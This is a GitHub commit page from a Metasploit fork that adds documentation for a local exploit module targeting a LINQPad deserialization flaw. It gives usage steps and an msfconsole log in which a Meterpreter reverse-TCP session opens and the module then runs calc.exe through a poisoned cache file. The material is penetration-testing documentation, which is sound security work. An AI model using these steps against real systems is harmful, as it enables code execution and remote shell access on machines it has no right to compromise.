forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
3604789
commit 2f2771b
Showing
2 changed files
with
50 additions
and
2 deletions.
There are no files selected for viewing
49 changes: 49 additions & 0 deletions
49
documentation/modules/exploit/windows/local/linqpad_deserialization.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| ## LINQPad 5.48 Deserialization | ||
|
|
||
| LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/). | ||
|
|
||
| ## Verification Steps | ||
| Steps: | ||
|
|
||
| 1. Install the application | ||
| 2. Start msfconsole | ||
| 3. Get Meterpreter/cmd shell | ||
| 4. Run: `use windows/local/linqpad_deserialization` | ||
| 5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters | ||
| 5. Set parameters `session`, `cache_path`, `linqpad_path` | ||
| 6. Run exploit | ||
|
|
||
| ## Options | ||
|
|
||
| ### cache\_path | ||
|
|
||
| The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file. | ||
|
|
||
| ### linqpad\_path | ||
|
|
||
| Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit. | ||
|
|
||
| Example: | ||
|
|
||
| ``` | ||
| msf6 > use exploit/multi/handler | ||
| msf6 exploit(multi/handler) > set LHOST 192.168.95.128 | ||
| msf6 exploit(multi/handler) > set LPORT 4242 | ||
| msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp | ||
| msf6 exploit(multi/handler) > run | ||
| [*] Started reverse TCP handler on 192.168.95.128:4242 | ||
| [*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100 | ||
| meterpreter > background | ||
| [*] Backgrounding session 1... | ||
| msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization | ||
| msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_PATH C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe | ||
| msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd | ||
| msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad | ||
| msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe | ||
| msf6 exploit(windows/local/linqpad_deserialization) > set session 1 | ||
| msf6 exploit(windows/local/linqpad_deserialization) > exploit | ||
| [*] Exploit completed, but no session was created. | ||
| ``` | ||
|
|
||
| Previous example will run `calc.exe` when LINQPad will start. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters